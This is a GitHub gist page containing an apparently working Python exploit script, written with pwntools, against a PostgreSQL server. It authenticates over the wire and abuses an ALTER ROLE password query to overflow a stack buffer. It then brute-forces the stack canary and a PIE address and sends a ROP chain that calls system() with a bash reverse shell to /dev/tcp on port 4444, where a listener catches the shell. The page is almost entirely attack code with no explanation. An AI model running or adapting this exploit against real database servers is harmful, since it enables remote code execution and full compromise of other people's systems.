Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
from pwn import *
import threading
alter = "ALTER ROLE test PASSWORD 'SCRAM-SHA-256$4096:UrxBRgDElbaS4iwfRzn59g==$SErsniXa5gEr03cXhcFPLSM4C/22IKTJ9emThT+wPrM=:{}';"
def authenticate():
init = unhex("00000050000300007573657200706f7374677265730064617461626173650074657374006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000")
r.send(init)
resp = r.recv(1024)
salt = resp[-4:]
shadow_pass = b"32e12f215ba27cb750c9e093ce4b5127"
enc_hash = hashlib.md5(shadow_pass + salt).hexdigest()
log.debug(f"Response hash: {enc_hash}")
auth = "\x70\x00\x00\x00\x28"
auth+= "md5"
auth+= enc_hash + "\x00"
r.send(auth)
resp = r.recv(1024)
if resp[5:9] == b"\x00" * 4:
log.debug("Authentication successful")
else:
log.error("Authentication failed")
def sendQuery(query):
data = b"Q"
data += p32(len(query) + 5, endianness = "big")
data += query.encode()
data += b"\x00"
r.send(data)
return r.recvS(timeout = 1)
def brute(data, p):
global r
for i in range(0, 256):
r = remote("127.0.0.1", 5432, level = 'error')
authenticate()
payload = b"A" * 72 + data + bytes([i])
p.status(hexdump(data + bytes([i]), width=8))
query = alter.format(b64e(payload))
try:
sendQuery(query)
r.close()
return bytes([i])
except EOFError:
r.close()
sleep(1)
continue
def getCanary():
global canary
with log.progress('') as p:
for i in range(7):
p.status(hexdump(canary, width=8))
canary += brute(canary, p)
def brutePIE(data, p):
global r
for i in range(0x00, 256):
r = remote("127.0.0.1", 5432, level = 'error')
authenticate()
payload = b"A" * 72 + canary + b"B" * 40 + data + bytes([i])
p.status(hexdump(data + bytes([i]), width=8))
query = alter.format(b64e(payload))
try:
if "MemoryContextAlloc" in sendQuery(query):
return bytes([i])
else:
r.close()
except:
r.close()
sleep(1)
continue
def getPIE():
global pieleak
with log.progress('') as p:
for i in range(7):
p.status(hexdump(pieleak, width=8))
pieleak += brutePIE(pieleak, p)
rebase = lambda address : p64(address + base)
def buildChain():
'''
0x00000000001cf094: mov qword ptr [rsi], rdi; ret;
'''
mov_rsi_rdi = rebase(0x00000000001cf094)
'''
0x00000000000c55cd: pop rdi; ret;
'''
pop_rdi = rebase(0x00000000000c55cd)
'''
0x00000000000f9731: pop rsi; ret;
'''
pop_rsi = rebase(0x00000000000f9731)
'''
0x00000000002ebffc: ret;
'''
ret = rebase(0x00000000002ebffc)
cmd = b"/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"
bss = 0x6fc000
system = 0xaa330
chain = b''
for i in range(0, len(cmd), 8):
chain += pop_rsi + rebase(bss + i)
chain += pop_rdi + cmd[i:i+8].ljust(8, b"\x00")
chain += mov_rsi_rdi
chain += pop_rdi + rebase(bss)
chain += ret
chain += rebase(system)
return chain
def execChain():
global r
r = remote("127.0.0.1", 5432, level = 'error')
authenticate()
chain = buildChain()
payload = b"A" * 72 + canary + b"B" * 40 + chain
query = alter.format(b64e(payload))
try:
sendQuery(query)
except:
return
if __name__ == "__main__":
r = None
canary = b"\x00"
pieleak = b"\xe0"
log.info("Leaking canary")
getCanary()
log.success(f"Leaked canary: {canary.hex()}")
log.info("Leaking PIE address")
getPIE()
log.success(f"Leaked PIE Address: 0x{pieleak[::-1].hex()}")
base = u64(pieleak) - 0x290ce0
log.success(f"Base address: {hex(base)}")
log.info("Sending ROP chain")
t = threading.Thread(target=execChain, args=[])
t.start()
l = listen("4444")
l.wait_for_connection()
l.interactive()
l.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment